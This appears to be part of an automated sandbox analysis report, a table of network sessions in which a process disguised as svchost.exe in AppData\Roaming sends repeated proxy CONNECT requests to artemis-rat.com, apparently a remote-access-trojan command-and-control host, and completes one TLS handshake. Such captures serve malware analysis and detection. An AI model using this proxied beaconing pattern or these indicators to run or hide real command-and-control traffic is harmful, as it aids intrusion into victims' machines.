                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3585192.168.2.56135152.73.224.54312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.235905886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.452919960 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3586192.168.2.561392185.162.229.1278043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.236732006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.391053915 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3587192.168.2.561376104.24.136.688043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.240022898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.394479990 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3588192.168.2.55786345.81.232.174705643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.245850086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3589192.168.2.56139034.49.208.2218043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.252599955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3590192.168.2.56011037.187.77.585259343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.253942966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3591192.168.2.561408185.238.228.2408043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.262531996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.416856050 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3592192.168.2.561098117.160.250.1638243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.262878895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.898073912 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3593192.168.2.5613171.15.62.12567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.263149023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3594192.168.2.56131945.138.87.238108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.277570963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3595192.168.2.56131491.241.217.58909043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.279592037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3596192.168.2.561330119.196.168.1838043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.279642105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3597192.168.2.561422172.67.36.218043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.282876015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.437360048 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3598192.168.2.56141943.153.22.291000543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.299537897 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:37.474549055 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:37.474767923 CET160INHTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl
                                                                                    Data Raw:
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3599192.168.2.55769751.89.173.405519843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.313622952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3600192.168.2.56009898.178.72.211091943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.408154011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3601192.168.2.557789182.93.69.74567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.408437014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3602192.168.2.560965139.224.64.191808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.408673048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.738758087 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3603192.168.2.561148180.250.159.49415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.411442995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3604192.168.2.56010251.75.206.2098043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.428567886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3605192.168.2.56012918.133.16.218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.444691896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.764921904 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:37.767570972 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 ac ad 0d b6 b9 b7 f1 ea 81 06 b6 45 1a 51 0e e9 f0 d3 12 84 4d e4 a8 e4 52 0c e3 f7 11 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eREQMR*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:38.060091019 CET536INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 29 76 93 28 8e 88 f3 e2 c7 51 5f c2 ad ce b1 0d 3f 18 05 34 4c 64 c9 25 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9)v(Q_?4Ld%DOWNGRD0000*H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0*H0_9Q
                                                                                    Mar 9, 2024 13:14:38.060184002 CET536INData Raw: 0f fa 08 18 4c fe 64 12 dd 31 cc e3 20 6a d4 dd 4e 90 c1 cb 8a a5 af de 21 13 8f 1c f8 7f 94 a4 d2 e9 f0 87 be a3 48 8e 21 6a 74 44 c0 8b b4 a6 47 cf d5 07 dc 22 cc e0 8d ef 2b d8 78 c0 bf a3 6c bf aa c2 47 47 bf 31 78 24 88 1c 40 19 a7 89 6d 22
                                                                                    Data Ascii: Ld1 jN!H!jtDG"+xlGG1x$@m"g2CYZA9Rz(.K`3ty0qGGU#Q.`d&6(;*%rgKy3H4$ho4NwC,( 6
                                                                                    Mar 9, 2024 13:14:38.060200930 CET7INData Raw: 03 00 04 0e 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 9, 2024 13:14:38.073204994 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 c9 bb be 17 a6 74 45 d4 0b 5d 22 4d 06 86 4d 55 93 6c 85 51 54 3b a6 c8 7a 46 24 22 11 2e 8f 05 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 58 c7 9d 04 38 89 49 43 cc 7a a2 37 28 fc 03 b9 6e 03 82 d9 1e
                                                                                    Data Ascii: %! tE]"MMUlQT;zF$".(X8ICz7(ngCX@
                                                                                    Mar 9, 2024 13:14:38.364908934 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 51 6a 6d 2c 90 da f4 7c 05 58 66 1c 62 8f a7 eb 47 a2 54 56 34 da 9b 8b ea 11 7d 1d 3d 73 13 7e 44 3f ce b6 03 7a 67 e3
                                                                                    Data Ascii: (Qjm,|XfbGTV4}=s~D?zg


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3606192.168.2.558056212.110.188.2073440543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.447839022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3607192.168.2.561360106.105.218.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.451615095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.378102064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3608192.168.2.561343212.50.19.150415343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.456511974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3609192.168.2.561433104.25.184.1898043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.456541061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.610843897 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3610192.168.2.561424107.180.90.421067043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.456722975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3611192.168.2.561383138.2.73.157108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
